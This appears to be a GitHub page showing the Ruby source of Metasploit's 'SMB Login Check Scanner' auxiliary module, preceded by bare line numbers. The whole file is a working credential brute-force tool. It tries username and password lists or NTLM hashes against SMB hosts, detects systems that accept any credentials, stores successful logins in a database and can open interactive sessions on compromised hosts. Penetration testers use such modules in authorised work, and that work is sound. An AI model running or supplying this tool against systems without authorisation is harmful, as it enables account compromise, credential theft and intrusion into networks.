/
smb_login.rb
304 lines (268 loc) · 10.8 KB
/
smb_login.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/smb'
require 'metasploit/framework/credential_collection'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::CommandShell
Aliases = [
'auxiliary/scanner/smb/login'
].freeze
def proto
'smb'
end
def initialize
super(
'Name' => 'SMB Login Check Scanner',
'Description' => %q{
This module will test a SMB login on a range of machines and
report successful logins. If you have loaded a database plugin
and connected to a database this module will record successful
logins and hosts so you can track your access.
},
'Author' => [
'tebo <tebo[at]attackresearch.com>', # Original
'Ben Campbell', # Refactoring
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>', # admin check
'Tom Sellers <tom[at]fadedcode.net>' # admin check/bug fix
],
'References' => [
[ 'CVE', '1999-0506'], # Weak password
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'DB_ALL_CREDS' => false,
'BLANK_PASSWORDS' => false,
'USER_AS_PASS' => false
}
)
# These are normally advanced options, but for this module they have a
# more active role, so make them regular options.
register_options(
[
Opt::Proxies,
OptBool.new('ABORT_ON_LOCKOUT', [ true, 'Abort the run when an account lockout is detected', false ]),
OptBool.new('PRESERVE_DOMAINS', [ false, 'Respect a username that contains a domain name.', true ]),
OptBool.new('RECORD_GUEST', [ false, 'Record guest-privileged random logins to the database', false ]),
OptBool.new('DETECT_ANY_AUTH', [false, 'Enable detection of systems accepting any authentication', false]),
OptBool.new('DETECT_ANY_DOMAIN', [false, 'Detect if domain is required for the specified user', false])
]
)
options_to_deregister = %w[USERNAME PASSWORD PASSWORD_SPRAY CommandShellCleanupCommand AutoVerifySession]
if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')
else
# Don't give the option to create a session unless smb sessions are enabled
options_to_deregister << 'CreateSession'
end
deregister_options(*options_to_deregister)
end
def create_session?
# The CreateSession option is de-registered if SMB_SESSION_TYPE is not enabled
# but the option can still be set/saved so check to see if we should use it
if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
datastore['CreateSession']
else
false
end
end
def run_host(ip)
print_brute(level: :vstatus, ip: ip, msg: 'Starting SMB login bruteforce')
domain = datastore['SMBDomain'] || ''
kerberos_authenticator_factory = nil
if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
fail_with(Msf::Exploit::Failure::BadConfig, 'The Smb::Rhostname option is required when using Kerberos authentication.') if datastore['Smb::Rhostname'].blank?
fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
kerberos_authenticator_factory = lambda do |username, password, realm|
Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
host: datastore['DomainControllerRhost'],
hostname: datastore['Smb::Rhostname'],
proxies: datastore['Proxies'],
realm: realm,
username: username,
password: password,
framework: framework,
framework_module: self,
cache_file: datastore['Smb::Krb5Ccname'].blank? ? nil : datastore['Smb::Krb5Ccname'],
# Write only cache so we keep all gathered tickets but don't reuse them for auth while running the module
ticket_storage: kerberos_ticket_storage({ read: false, write: true })
)
end
end
@scanner = Metasploit::Framework::LoginScanner::SMB.new(
host: ip,
port: rport,
local_port: datastore['CPORT'],
stop_on_success: datastore['STOP_ON_SUCCESS'],
proxies: datastore['Proxies'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 5,
max_send_size: datastore['TCP::max_send_size'],
send_delay: datastore['TCP::send_delay'],
framework: framework,
framework_module: self,
kerberos_authenticator_factory: kerberos_authenticator_factory,
use_client_as_proof: create_session?
)
if datastore['DETECT_ANY_AUTH']
bogus_result = @scanner.attempt_bogus_login(domain)
if bogus_result.success?
if bogus_result.access_level == Metasploit::Framework::LoginScanner::SMB::AccessLevels::GUEST
print_status('This system allows guest sessions with random credentials')
else
print_error('This system accepts authentication with random credentials, brute force is ineffective.')
return
end
else
vprint_status('This system does not accept authentication with random credentials, proceeding with brute force')
end
end
cred_collection = build_credential_collection(
realm: domain,
username: datastore['SMBUser'],
password: datastore['SMBPass']
)
cred_collection = prepend_db_hashes(cred_collection)
@scanner.cred_details = cred_collection
@scanner.scan! do |result|
case result.status
when Metasploit::Model::Login::Status::LOCKED_OUT
if datastore['ABORT_ON_LOCKOUT']
print_error("Account lockout detected on '#{result.credential.public}', aborting.")
break
else
print_error("Account lockout detected on '#{result.credential.public}', skipping this user.")
end
when Metasploit::Model::Login::Status::DENIED_ACCESS
print_brute level: :status, ip: ip, msg: "Correct credentials, but unable to login: '#{result.credential}', #{result.proof}"
report_creds(ip, rport, result)
:next_user
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' #{result.access_level}"
report_creds(ip, rport, result)
if create_session?
begin
smb_client = result.proof
session_setup(result, smb_client)
rescue StandardError => e
elog('Failed to setup the session', error: e)
print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
end
end
:next_user
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore['VERBOSE']
print_brute level: :verror, ip: ip, msg: 'Could not connect'
end
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: result.credential.realm,
last_attempted_at: DateTime.now,
status: result.status
)
:abort
when Metasploit::Model::Login::Status::INCORRECT
if datastore['VERBOSE']
print_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}', #{result.proof}"
end
invalidate_login(
address: ip,
port: rport,
protocol: 'tcp',
public: result.credential.public,
private: result.credential.private,
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: result.credential.realm,
last_attempted_at: DateTime.now,
status: result.status
)
end
end
end
# This logic is not universal ie a local account will not care about workgroup
# but remote domain authentication will so check each instance
def accepts_bogus_domains?(user, pass)
bogus_domain = @scanner.attempt_login(
Metasploit::Framework::Credential.new(
public: user,
private: pass,
realm: Rex::Text.rand_text_alpha(8)
)
)
return bogus_domain.success?
end
def report_creds(ip, port, result)
if !datastore['RECORD_GUEST'] && (result.access_level == Metasploit::Framework::LoginScanner::SMB::AccessLevels::GUEST)
return
end
service_data = {
address: ip,
port: port,
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
origin_type: :service,
private_data: result.credential.private,
private_type: (
Rex::Proto::NTLM::Utils.is_pass_ntlm_hash?(result.credential.private) ? :ntlm_hash : :password
),
username: result.credential.public
}.merge(service_data)
if datastore['DETECT_ANY_DOMAIN'] && domain.present?
if accepts_bogus_domains?(result.credential.public, result.credential.private)
print_brute(level: :vstatus, ip: ip, msg: "Domain is ignored for user #{result.credential.public}")
else
credential_data.merge!(
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: result.credential.realm
)
end
end
credential_core = create_credential(credential_data)
login_data = {
access_level: result.access_level,
core: credential_core,
last_attempted_at: DateTime.now,
status: result.status
}.merge(service_data)
create_credential_login(login_data)
end
# @param [Metasploit::Framework::LoginScanner::Result] result
# @param [RubySMB::Client] client
# @return [Msf::Sessions::SMB]
def session_setup(result, client)
return unless client
# Create a new session
rstream = client.dispatcher.tcp_socket
sess = Msf::Sessions::SMB.new(
rstream,
{
client: client
}
)
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => result.credential.public,
'PASSWORD' => result.credential.private
}
start_session(self, nil, merge_me, false, sess.rstream, sess)
end
end